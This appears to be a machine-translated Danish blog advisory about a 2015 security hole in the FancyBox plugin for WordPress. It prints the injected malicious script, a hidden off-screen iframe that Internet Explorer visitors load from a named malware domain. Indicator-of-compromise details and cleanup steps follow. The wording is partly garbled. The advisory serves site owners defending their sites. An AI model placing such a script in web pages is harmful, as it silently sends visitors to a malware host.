Tidligere i denne uge en række hjemmesider og blogs WordPress, modtaget advarsler fra inficeret med malware igennem Google Webmasters.
Det problem, som Google Webmasters henvises til, er tilstedeværelsen af en torsk / script iframe malware kilde websteder.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>Det ser ud til, at det er en sårbarhed a pluginregelværk FancyBox til WordPress der indtil i går (05.02.2015) ikke havde været opdateret i lang tid.
Løsning af dette problem og desinfektion virus sites med denne malware er forholdsvis enkel.
1. Deaktiver FancyBox-pluginet.
2. Slet alle FancyBox-pluginfiler fra serveren (via FTP)
3. Installer den nye version af pluginet (Fancybox 3.0.4)
FancyBox til WordPress 3.0.4
- Omdøbt indstillingen, der er påvirket af sikkerhedsproblemet nævnt i 3.0.3. Dette skulle forhindre den ondsindede kode i at blive vist på websteder, hvor plugin'et er updated uden at fjerne den skadelige kode.
FancyBox til WordPress 3.0.3
- Rettet et sikkerhedsproblem.
Malware Info:
TYPE: Iframe omdirigering
TARGET: WordPress fancybox
MALWARE DOMAIN: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
MALWARE RAW KODER:
MALWARE SKRIFTLIG: if (navigator.userAgent.match(/msie/i)) { document.write(‘
Fjern malware fra din WordPress hjemmeside.
